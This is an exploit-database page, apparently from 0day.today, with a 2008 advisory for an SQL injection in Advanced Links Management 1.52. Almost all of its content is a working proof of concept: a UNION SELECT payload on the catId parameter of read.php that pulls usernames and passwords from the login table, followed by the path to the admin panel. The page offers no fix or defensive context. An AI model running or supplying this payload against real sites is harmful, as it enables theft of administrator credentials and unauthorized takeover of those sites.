[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Advanced Links Management (ALM) 1.52 SQL Injection Vulnerability

Author
His0k4
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2985
Category
web applications
Date add
09-05-2008
Platform
unsorted
================================================================
Advanced Links Management (ALM) 1.52 SQL Injection Vulnerability
================================================================



###################################################
[~] ALM - Advanced Links Management remote SQL injection exploit
[~] Script download : http://www.easy-script.com/scripts-dl/alm_v152.zip                                                                                                            
[~] Founder: His0k4 
[~] Greetz : All friends & muslims HaCkErS...
[~] P.O.C :
---------------------
http://localhost/[script_path]/read.php?catId={SQL}
[~] Exemple :
http://localhost/[script_path]/read.php?catId=-1 UNION SELECT 1,concat(username,0x3a,password) FROM login--
---------------------
[~] Note:
    Admin login:  http://localhost/[script_path]/admin
---------------------
###############################################



#  0day.today [2024-11-16]  #